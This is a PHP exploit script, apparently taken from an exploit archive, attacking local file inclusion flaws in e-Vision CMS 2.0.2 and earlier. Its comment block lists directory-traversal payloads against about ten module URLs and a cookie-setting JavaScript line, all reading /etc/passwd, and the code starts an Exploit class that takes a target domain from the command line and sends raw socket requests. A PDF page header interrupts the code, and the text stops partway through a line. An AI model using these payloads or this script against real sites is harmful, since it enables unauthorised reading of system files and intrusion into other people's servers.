1 <?php
2
3 error_reporting(0);
4 ini_set("default_socket_timeout",5);
5
6
7
8
9 /*
10 e−Vision <= 2.0.2 Multiple Local File Inclusion Exploit
11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 by athos − download http://sourceforge.net
13 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
14 Works with magic quotes gpc turned off
15
16
17 javascript: document.cookie="adminlang=../../../../etc/passwd";
18 modules/3rdparty/adminpart/add3rdparty.php?module=../../../../../../etc/passwd
19 modules/polling/adminpart/addpolling.php?module=../../../../../etc/passwd
20 modules/contact/adminpart/addcontact.php?module=../../../../etc/passwd
21 modules/brandnews/adminpart/addbrandnews.php?module=../../../etc/passwd
22 modules/newsletter/adminpart/addnewsletter.php?module=../../../../etc/passwd
23 modules/game/adminpart/addgame.php?module=../../../../etc/passwd
24 modules/tour/adminpart/addtour.php?module=../../../etc/passwd
25 modules/articles/adminpart/addarticles.php?module=../../../../etc/passwd
26 modules/product/adminpart/addproduct.php?module=../../../../etc/passwd
27 modules/plain/adminpart/addplain.php?module=../../../../../etc/passwd
28
29 ../../etc/passwd and nullbyte
30
31 how to fix? addslashes($_GET[’module’]); so you remove the nullbyte...isn’t a good fix
32
33
34 coded by me
35
36
37 */
38
39 $exploit = new Exploit;
40 $domain = $argv[1];
41 $mymode = $argv[2];
42
43 $exploit−>starting();
44 $exploit−>is_vulnerable($domain);
45 $exploit−>exploiting($domain,$mymode);
46
47
48
49 class Exploit
50 {
51 function http_request($host,$data)
52 {
Page 1/5
eVision CMS 2.0.2 Multiple Local File Inclusion Exploit
StAkeR
11/07/2008
53
54 if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
55 {
56 echo "socket_create() error!\r\n";
57 exit;
58 }
59 if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
60 {
61 echo "socket_set_o